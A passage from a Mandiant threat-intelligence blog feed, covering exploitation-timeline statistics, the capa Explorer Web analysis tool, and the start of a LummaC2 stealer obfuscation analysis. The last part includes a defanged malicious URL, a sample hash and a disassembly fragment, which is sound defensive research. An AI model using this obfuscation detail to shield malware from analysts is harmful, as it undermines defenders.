within. This suggests that intended utilization is a driving consideration for an adversary. Directing more energy toward exploit development of the more difficult, yet "more valuable" vulnerability would be logical if it better aligns with their objectives, whereas the easier-to-exploit and "less valuable" vulnerability may present more value to more opportunistic adversaries.</span></p> <h2><span style="vertical-align: baseline;">Exploited Vulnerabilities by Vendor</span></h2> <p><span style="vertical-align: baseline;">Exploited vendors continue to grow in both number and variety. In 2023, we saw a 17% increase from our previous highest exploited vendor count in 2021. In recent years, Microsoft, Apple, and Google have been the most exploited vendors year over year. However, their prominence in the overall number of exploited vendors has continued to decrease, falling just below 40% this past year. This is about a 10% drop from the just under 50% we saw from 2021 to 2022. Additionally, this is one of the first times in a while that one of the three has barely made a top spot. Google had eight vulnerabilities exploited, while Adobe, the fourth most exploited vendor, had six vulnerabilities exploited. Further, 31 of the 53 vendors (58%) had only one vulnerability exploited. Attackers are diversifying their targets and seeing success in doing so. As variance in targeted products continues to grow along with exploitation frequency, defenders must meet the challenge of protecting sprawling attack surfaces.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig7.max-1000x1000.jpg" alt="Number of vendors exploited by year"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We note that the total number of vulnerabilities affecting a vendor does not directly relate to how secure or insecure a vendor's security posture is, nor does it signify that it is "less secure" than its competitors. Ubiquity of product use and the extent of a vendor's offered products both impact the numbers we see. Given the extent of today's challenges around defending such diversified systems and networks, learning from best practices across industries will lead to some of the best approaches for seeing successful exploitation prevention.</span></p> <h2><span style="vertical-align: baseline;">Implications</span></h2> <p><span style="vertical-align: baseline;">As the amount of discovered vulnerabilities </span><a href="https://www.cvedetails.com/browse-by-date.php" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">grows over time</span></a><span style="vertical-align: baseline;">, threat actors are provided with more opportunities to take advantage of these weaknesses. Mandiant has found that exploits, for both zero-days and n-days, have been the number one initial infection vector in Mandiant Incident Response (IR) engagements for </span><a href="https://services.google.com/fh/files/misc/rpt-mtrends-2021-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2020</span></a><span style="vertical-align: baseline;">, </span><a href="https://services.google.com/fh/files/misc/m-trends-report-2022-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2021</span></a><span style="vertical-align: baseline;">, </span><a href="https://services.google.com/fh/files/misc/m_trends_2023_report.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2022</span></a><span style="vertical-align: baseline;">, and </span><a href="https://services.google.com/fh/files/misc/m-trends-2024.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2023</span></a><span style="vertical-align: baseline;">. This is pushing defenders to provide efficient detection and response as well as to adapt to events in real time. Further, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/putting-model-work-enabling-defenders-vulnerability-intelligence-intelligence-vulnerability-management-part-four"><span style="text-decoration: underline; vertical-align: baseline;">patching prioritization</span></a><span style="vertical-align: baseline;"> is increasingly difficult as n-days are exploited more quickly and in a greater variety of products. This increase in available technologies expands attack surfaces, reinforcing the importance of considering how a singular vulnerable technology could affect systems and networks laterally. Segmented architectures and access control implementations should be prioritized in order to limit the extent of impacted systems and data when exploitation does occur.</span></p> <p><span style="vertical-align: baseline;">After multiple years of tracking our observed TTEs, we can see that the numbers fall drastically with each analysis. Just five to six years ago, we observed an average TTE of 63 days. That number has now fallen to five days. While we are aware that better and more common threat detection capabilities are likely an aspect of growing exploitation numbers, our data clearly shows that attackers are able to move quickly enough to beat patching cycles. As threat actors shorten TTEs and have more success with zero-day exploitation, delaying patching and exposing insufficiently protected attack surfaces heightens the chance of successful attacks.</span></p> <p><span style="vertical-align: baseline;">Our data has continued to show that exploit release and media attention are not predictive of exploitation timelines. While in some cases these data points are correlated, the trends do not currently show that these factors should dictate prioritization or constitute an elevated response to a given vulnerability. Exploit release and the attention received by a vulnerability should be taken into account; however, they should be considered heuristic data points alongside other factors such as the difficulty of exploitation and the value exploitation may present.</span></p> <h2><span style="vertical-align: baseline;">Outlook</span></h2> <p><span style="vertical-align: baseline;">Based on our analyses, we know that zero-day exploitation remains a coveted approach for threat actors. If zero-day exploitation continues to outnumber n-day exploitation while n-day exploitation continues to occur more quickly following disclosure, we could expect the average TTE to fall further in the future. Additionally, because zero-day discovery is more difficult, there is room for growing numbers of exploited vulnerabilities over time as detection tools continue improving and become more widespread.</span></p> <p><span style="vertical-align: baseline;">We do not expect n-day usage to drop significantly, nor for the number of targeted vendors to decrease over the coming years. We expect threat actors to continue using both n-days and zero-days as well as to expand exploitation across more vendors and products. Trends are expected to likely follow quicker exploitation timelines across a larger span of targets.</span></p> <p><span style="vertical-align: baseline;">It is important to note that the increased ratio of zero-day exploitation and the generally shrinking timelines do not imply that threat actors will stop targeting n-days. We have seen, many times over, how threat actors will utilize vulnerabilities months or years after patches have been released.</span></p></div></description><pubDate>Tue, 15 Oct 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/time-to-exploit-trends-2023/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>How Low Can You Go? An Analysis of 2023 Time-to-Exploit Trends</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/time-to-exploit-trends-2023/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>capa Explorer Web: A Web-Based Tool for Program Capability Analysis</title><link>https://cloud.google.com/blog/topics/threat-intelligence/capa-explorer-web-program-capability-analysis/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Soufiane Fariss, Willi Ballenthin, Mike Hunhoff, Genwei Jiang, Tina Johnson, Moritz Raabe</span></p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;"><a href="https://cloud.google.com/blog/topics/threat-intelligence/capa-automatically-identify-malware-capabilities/">capa</a>, developed by Mandiant's FLARE team, is a reverse engineering tool that automates the identification of program capabilities. In this blog post we introduce </span><a href="https://mandiant.github.io/capa/explorer/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">capa Explorer Web</span></a><span style="vertical-align: baseline;">, a browser-based tool to display the capabilities found by capa. The capa Explorer Web UI provides an intuitive and interactive way to visualize the capa analysis results.</span></p> <p><span style="vertical-align: baseline;">This feature was implemented by Soufiane Fariss (</span><a href="https://github.com/s-ff" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">@s-ff</span></a><span style="vertical-align: baseline;">) as part of the </span><a href="https://summerofcode.withgoogle.com/programs/2024/projects/cR3hjbsq" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Summer of Code (GSoC) project</span></a><span style="vertical-align: baseline;"> that the Mandiant FLARE team mentored in 2024.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig1.max-1000x1000.png" alt="Using capa Explorer Web to visualize the results of a dropper"> </a> <figcaption class="article-image__caption "><p data-block-key="65h86">Figure 1: Using <a href="https://mandiant.github.io/capa/explorer/">capa Explorer Web</a> to visualize the results of a <a href="https://www.virustotal.com/gui/file/2b09154b498e9959f5efbcfa768dcdc2394dc527b2785e1ce68bc8a33c6804b8">dropper</a></p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Background</span></h2> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/capa-automatically-identify-malware-capabilities/"><span style="text-decoration: underline; vertical-align: baseline;">capa analyzes programs</span></a><span style="vertical-align: baseline;"> using various backends, such as </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/capa-2-better-stronger-faster/"><span style="text-decoration: underline; vertical-align: baseline;">IDA Pro</span></a><span style="vertical-align: baseline;">, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/capa-harnesses-ghidra"><span style="text-decoration: underline; vertical-align: baseline;">Ghidra</span></a><span style="vertical-align: baseline;">, and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/dynamic-capa-executable-behavior-cape-sandbox/"><span style="text-decoration: underline; vertical-align: baseline;">CAPE</span></a><span style="vertical-align: baseline;">, to extract features. Then it identifies capabilities by matching these features against rules written by experts. A program matches a capability rule when its extracted features match the set of conditions declared in the rule.</span></p> <p><span style="vertical-align: baseline;">Before the release of capa Explorer Web, the </span><a href="https://github.com/mandiant/capa/tree/master/capa/ida/plugin" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">capa Explorer IDA</span></a><span style="vertical-align: baseline;"> plugin was the only way to interactively explore capa rule matches. Analysts without access to IDA Pro had no graphical interface to easily inspect capa results. Due to the large amount of data this was especially a shortcoming for the exploration of dynamic results, a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/dynamic-capa-executable-behavior-cape-sandbox"><span style="text-decoration: underline; vertical-align: baseline;">feature introduced in capa v7.0</span></a><span style="vertical-align: baseline;"> for detecting capabilities from sandbox traces.</span></p> <h2><span style="vertical-align: baseline;">Introducing capa Explorer Web</span></h2> <p><span style="vertical-align: baseline;">capa Explorer Web offers an intuitive and interactive visualization of capa analysis results. Users can browse rule matches and understand the reasoning behind them. Analysts can sort, search, and filter results. The interface offers different views including a table view with rule match details (see Figure 1), a function-centric view for static analysis, and a process-tree view for dynamic analysis results.</span></p></div> <div class="block-aside"><dl> <dt>aside_block</dt> <dd>&lt;ListValue: [StructValue([(&#x27;title&#x27;, &#x27;capa Explorer Web&#x27;), (&#x27;body&#x27;, &lt;wagtail.rich_text.RichText object at 0x3ee3b2655ee0&gt;), (&#x27;btn_text&#x27;, &#x27;Use capa Web Explorer now!&#x27;), (&#x27;href&#x27;, &#x27;https://mandiant.github.io/capa/explorer/&#x27;), (&#x27;image&#x27;, None)])]&gt;</dd> </dl></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Getting Started</span></h3> <p><span style="vertical-align: baseline;">capa Explorer Web is <a href="https://mandiant.github.io/capa/explorer/" rel="noopener" target="_blank">accessible online at our GitHub page</a></span><span style="vertical-align: baseline;">, and you can start analyzing capa results immediately (see Figure 2). For offline usage, you can download a standalone HTML file from the website. Similar to CyberChef, it is an HTML file that can be opened locally in a browser and works without an Internet connection.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig2.max-1000x1000.png" alt="capa Explorer Web home page"> </a> <figcaption class="article-image__caption "><p data-block-key="65h86">Figure 2: capa Explorer Web home page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">To generate a capa result document, follow these quick steps to get started:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><a href="https://github.com/mandiant/capa/blob/master/doc/installation.md" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Install capa</span></a><span style="vertical-align: baseline;">, e.g. download the latest </span><a href="https://github.com/mandiant/capa/releases" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">standalone executable release</span></a></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Analyze a sample and save the JSON results: </span><code style="vertical-align: baseline;">capa.exe -j /path/to/file &gt; result.json</code></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Load the JSON results file into capa Explorer Web</span></p> </li> </ol> <h3><span style="vertical-align: baseline;">Loading capa Results</span></h3> <p><span style="vertical-align: baseline;">capa Explorer Web allows you to load capa result documents from local JSON files, including Gzipped files. All processing occurs in your browser – no data is transferred to any server.</span></p> <h3><span style="vertical-align: baseline;">Default Table View Showing Rule Match Details</span></h3> <p><span style="vertical-align: baseline;">The default web UI displays identified program capabilities in a rule match table. Users can expand, sort, filter, and search rule match details (see Figure 3). This enables analysts to triage samples faster. The table shows detailed information for each rule match – including matched features and their addresses. Users can also view and filter on rule meta information like namespaces, associated </span><a href="https://attack.mitre.org/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK</span></a><span style="vertical-align: baseline;"> techniques, and </span><a href="https://github.com/MBCProject/mbc-markdown#malware-objective-descriptions" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Malware Behavior Catalog classifications (MBC)</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Figure 3 illustrates how an analyst can use capa Explorer Web to study the details of a rule match. Expanding the “inject APC” match row shows which features capa identified including their location in the program. This insight can streamline the identification of key behaviors and further support additional analysis – for example, when inspecting sandbox traces, debugging a sample, or analyzing the disassembled file.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig3.max-1000x1000.png" alt="Static analysis results in capa Explorer Web"> </a> <figcaption class="article-image__caption "><p data-block-key="c4dce">Figure 3: Static analysis results in capa Explorer Web</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Figure 4 demonstrates how analysts can leverage capa's dynamic analysis results to identify suspicious processes which exhibit malicious behavior. For instance, the process "explorer.exe" (a seemingly benign name) is shown invoking the </span><code style="vertical-align: baseline;">InternetCrackUrl</code><span style="vertical-align: baseline;"> API with potentially malicious URLs as arguments, such as hxxps://216.201.159[.]118:443/cHOPH1oQ.php. This noteworthy functionality hints at possible process injection, and here even provides potential network-based indicators for further analysis.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig4.max-1000x1000.png" alt="Dynamic analysis results in capa Explorer Web"> </a> <figcaption class="article-image__caption "><p data-block-key="fordu">Figure 4: Dynamic analysis results in capa Explorer Web</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Rule Match Context</span></h3> <p><span style="vertical-align: baseline;">Via right-click on a match row users can access additional explorer functionality. This includes viewing the rule source definition as shown in Figure 5, opening the rule definition in the </span><a href="https://mandiant.github.io/capa/rules/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">capa rules website</span></a><span style="vertical-align: baseline;">, or searching for samples with this capability in VirusTotal to gain broader threat intelligence insights. The VirusTotal lookup requires a premium account.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig5.max-1000x1000.png" alt="Inspecting the source logic via the rule match context menu"> </a> <figcaption class="article-image__caption "><p data-block-key="fordu">Figure 5: Inspecting the source logic via the rule match context menu</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Alternative Views Grouping Functions and Processes</span></h3> <p><span style="vertical-align: baseline;">The function and process capability views in capa Explorer Web offer granular insights into program functionality, organized by their location within the analyzed sample. For static analysis results, the function capabilities view groups rule matches by function address, allowing reverse engineers to quickly identify functions with key behavior (see Figure 6).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig6.max-1000x1000.png" alt="Static analysis results grouped by function"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 6: Static analysis results grouped by function</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For dynamic analysis results, the process capabilities view organizes matches by process in a tree structure, showing Process ID (PID) and Parent Process ID (PPID) information (see Figure 7). Hovering a process column shows the respective rule matches.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig7.max-1000x1000.png" alt="Dynamic analysis results grouped by process"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 7: Dynamic analysis results grouped by process</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Integrating capa Explorer Web with VirusTotal </span></h2> <p><span style="vertical-align: baseline;">capa </span><a href="https://blog.virustotal.com/2023/01/mandiants-capa-goresym-to-reinforce-vts.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">has been integrated as part of VirusTotal's analysis</span></a><span style="vertical-align: baseline;"> since January 2023. Our new UI integration enables users to explore capa results directly from VirusTotal. With this you do not need to acquire a sample or analyze it locally with capa. To open capa Explorer Web from VirusTotal navigate to: </span><strong style="vertical-align: baseline;">Behavior</strong><span style="vertical-align: baseline;"> &gt; </span><strong style="vertical-align: baseline;">Download Artifacts</strong><span style="vertical-align: baseline;"> &gt; </span><strong style="vertical-align: baseline;">Open in CAPA Explorer</strong><span style="vertical-align: baseline;"> (see Figure 8) or use </span><strong style="vertical-align: baseline;">Open in CAPA explorer</strong><span style="vertical-align: baseline;"> next to Capabilities (see Figure 9). Currently, this feature requires a premium VirusTotal subscription.</span></p> <p><span style="vertical-align: baseline;">Note that not all files have capa analysis results available. capa currently only supports analysis of non-corrupted PE, .NET, and ELF x86/x64 executables.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-web-explorer-fig8a.max-1000x1000.png" alt="Access capa Explorer Web analysis from VirusTotal"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 8: Access capa Explorer Web analysis from VirusTotal</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig9.max-1000x1000.png" alt="Alternative link to open capa Explorer Web analysis from VirusTotal"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 9: Alternative link to open capa Explorer Web analysis from VirusTotal</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When reviewing a new sample on VirusTotal, an analyst can pivot directly into capa Explorer Web to identify interesting locations within the program. This workflow allows prioritization of functions for deeper code analysis in the preferred reverse engineering tool.</span></p> <h2><span style="vertical-align: baseline;">Future Work</span></h2> <p><span style="vertical-align: baseline;">For future enhancements of <a href="https://mandiant.github.io/capa/explorer/" rel="noopener" target="_blank">capa Explorer Web</a>, we plan to first </span><a href="https://github.com/mandiant/capa/issues/2357" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">enhance the process tree view</span></a><span style="vertical-align: baseline;"> mode to improve visualization of per-process matches. Additionally, we are considering new views to </span><a href="https://github.com/mandiant/capa/issues/1907" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">include extracted Indicators of Compromise</span></a><span style="vertical-align: baseline;"> (IoCs) for dynamic analysis. This could display extracted indicators such as URLs, file paths, and registry keys to further enhance the triage process. We are looking forward to your feedback and suggestions. Please reach out via our </span><a href="https://github.com/mandiant/capa/issues" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">GitHub issues</span></a><span style="vertical-align: baseline;"> page.</span></p> <h2><span style="vertical-align: baseline;">Soufiane’s Google Summer of Code Acknowledgement</span></h2> <p><span style="vertical-align: baseline;">Working on Google Summer of Code 2024 expanded my technical skills significantly: I learned new programming languages and frameworks, improved my code review skills, and gained practical experience with CI/CD practices and software distribution.</span><span style="vertical-align: baseline;">I’d like to thank my mentors for supporting me throughout the whole project. They have been very helpful from the get-go. This project wouldn’t have gone smoothly without their feedback and encouragement.</span></p> <p><span style="vertical-align: baseline;">For future (GSoC) contributors, I recommend: dive deep into the existing codebase, don't hesitate to ask questions, and always share your thoughts with the other collaborators. I'm anticipating the continued evolution of capa and other open source tools. Whether through implementing new features, improving performance, extending file format support, or enhancing visualizations and integrations with other reverse engineering tools; the potential for growth is quite exciting and you can take part in it.</span></p></div></description><pubDate>Tue, 01 Oct 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/capa-explorer-web-program-capability-analysis/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>capa Explorer Web: A Web-Based Tool for Program Capability Analysis</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/capa-explorer-web-program-capability-analysis/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>LummaC2: Obfuscation Through Indirect Control Flow</title><link>https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscation-through-indirect-control-flow/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Nino Isakovic, Chuong Dong</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Overview</span></h2> <p><span style="vertical-align: baseline;">This blog post delves into the analysis of a control flow obfuscation technique employed by recent </span><a href="https://www.virustotal.com/gui/collection/malpedia_win_lumma" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">LummaC2 (LUMMAC.V2) stealer</span></a><span style="vertical-align: baseline;"> samples. In addition to the traditional </span><a href="https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/#control-flow-flattening" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">control flow flattening technique</span></a><span style="vertical-align: baseline;"> used in older versions, the malware now leverages customized control flow indirection to manipulate the execution of the malware. This technique thwarts all binary analysis tools including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process, but also automation tooling designed to capture execution artifacts and generate detections.</span></p> <p><span style="vertical-align: baseline;">To provide insights to Google and Mandiant security teams, we developed an automated method for removing this protection layer through symbolic backward slicing. By leveraging the recovered control flow, we are able to rebuild and deobfuscate the samples into a format readily consumable for any static binary analysis platform.</span></p> <h2><span style="vertical-align: baseline;">Protection Components</span></h2> <h3><span style="vertical-align: baseline;">Overview</span></h3> <p><span style="vertical-align: baseline;">An obfuscating compiler, which we will also informally refer to as an "obfuscator," is a transformation tool designed to enhance the security of software binaries by making them more resilient to binary analysis. It operates by transforming a given binary into a protected representation, thereby increasing the difficulty for the code to be analyzed or tampered with. These transformations are typically applied at a per-function basis where the user selects the specific functions to apply these transformations to.</span></p> <p><span style="vertical-align: baseline;">Obfuscating compilers are distinct from packers, although they may incorporate packing techniques as part of their functionality. They fall under the broader classification of software protections, such as OLLVM, VMProtect, and Code Virtualizer, which provide comprehensive code transformation and protection mechanisms beyond simple packing. Notably, for all protected components, the original code will never be exposed in its original, unprotected form at any point during the runtime of a protected binary. It is also common for obfuscating compilers to mix the original compiler-generated code with obfuscator-introduced code. This generally tends to necessitate a comprehensive deobfuscator from an analyst in order to analyze the binary.</span></p> <p><span style="vertical-align: baseline;">The obfuscator employed by LummaC2 applies a multitude of transformations consistent with standard obfuscating compiler technology. Our concern only focuses on the newly introduced control flow protection scheme that we uncovered.</span></p> <p><span style="vertical-align: baseline;">Our analysis strongly suggests that the authors of the obfuscator have intimate knowledge of the LummaC2 stealer. Certain parts of the protection, as described in the upcoming sections, are specialized to handle specific components of the LummaC2 stealer.</span></p> <h3><span style="vertical-align: baseline;">Dispatcher Blocks</span></h3> <p><span style="vertical-align: baseline;">The obfuscator transforms the control flow of a protected function into one guided by "dispatcher blocks," each consisting of a subset of the original instructions that constituted the unprotected function and the new instructions introduced by the obfuscator. Each dispatcher block ends with an indirect jump that branches to a dynamically-resolved destination stored in a register or memory address. The result produced thereof mutates the original progressive linear control flow into a disjointed series of scattered blocks. Each block is isolated, containing only the runtime logic necessary to transfer execution to its immediate successor block.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig1.max-1000x1000.png" alt="Dispatcher blocks overview"> </a> <figcaption class="article-image__caption "><p data-block-key="lfzh6">Figure 1: Dispatcher blocks overview</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We refer to all instructions generated by the obfuscator as "dispatcher instructions" to differentiate them from "original instructions." Dispatcher blocks used by the obfuscator can be categorized into two main types: unconditional and conditional dispatcher.</span></p> <ul> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Unconditional dispatcher</strong><span style="vertical-align: baseline;">: This dispatcher</span><span style="vertical-align: baseline;"> type protects the majority of instructions in an obfuscated function. It consists of dispatcher instructions that fetch encoded offsets from a lookup table in the </span><code><span style="vertical-align: baseline;">.data</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">section and perform ADD and XOR operations on them to calculate the next destination to transfer execution to.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Conditional dispatcher: </strong><span style="vertical-align: baseline;">This dispatcher type protects either individual conditional jump instructions (e.g., </span><code><span style="vertical-align: baseline;">jne</span></code><span style="vertical-align: baseline;"> or </span><code><span style="vertical-align: baseline;">ja</span></code><span style="vertical-align: baseline;">)</span><span style="vertical-align: baseline;"> or basic blocks that end with a conditional jump. </span><span style="vertical-align: baseline;">Instead of a single encoded offset to calculate and transfer execution to, the conditional dispatcher fetches one of two possible encoded offsets depending on the result of the condition to test.</span></p> </li> </ul> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig2.max-1000x1000.png" alt="Dispatcher block types"> </a> <figcaption class="article-image__caption "><p data-block-key="lfzh6">Figure 2: Dispatcher block types</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Conditional and unconditional dispatcher blocks are further categorized based on the distinct characteristics and layout of dispatcher instructions.</span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Register-based dispatcher: </strong><span style="vertical-align: baseline;">All calculations from dispatcher instructions operate solely on registers and always constitute the remaining instructions of the basic block.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Memory-based dispatcher: </strong><span style="vertical-align: baseline;">Dispatcher instructions operate on both registers and stack values for calculating the final jump destination and are also always the remaining instructions within the basic block.</span></li> <li><strong style="vertical-align: baseline;">Mixed-order dispatcher:</strong><span style="vertical-align: baseline;"> A variant of register-based and memory-based dispatchers. The order and positions of dispatcher instructions in this layout are intertwined among original instructions that they are protecting instead of being placed at the end of the block.</span></li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig3.max-1000x1000.png" alt="Obfuscating compiler dispatcher layouts"> </a> <figcaption class="article-image__caption "><p data-block-key="by1mg">Figure 3: Obfuscating compiler dispatcher layouts</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Dispatcher blocks can also exist standalone where they do not protect any original code. In such cases, they act as a single step responsible for continuing the control flow. </span></p> <h3><span style="vertical-align: baseline;">Register-based Dispatcher Layout</span></h3> <p><span style="vertical-align: baseline;">Using the following LummaC2 sample with MD5 hash </span><code><span style="vertical-align: baseline;">205e45e123aea66d444feaba9a846748</span></code><span style="vertical-align: baseline;"> from the </span><a href="https://www.virustotal.com/gui/collection/fde9be4abcbec24b6f5c47fb819c0d9adeb84e5113a4b5058142350ae58f7a95" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence collection here</span></a><span style="vertical-align: baseline;"> as a case study, we discover that out of 2,009 dispatcher blocks processed, there are 1,981 register-based dispatcher blocks, making it the most common dispatcher layout. This layout is applied to both conditional and unconditional dispatcher types that occur in any protected function.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>00416630 mov eax, off_457C8C ; Retrieve CONSTANT1 from .data section 00416635 mov ecx, 22A7266Eh ; Populate CONSTANT2 0041663A xor ecx, dword_457C94 ; 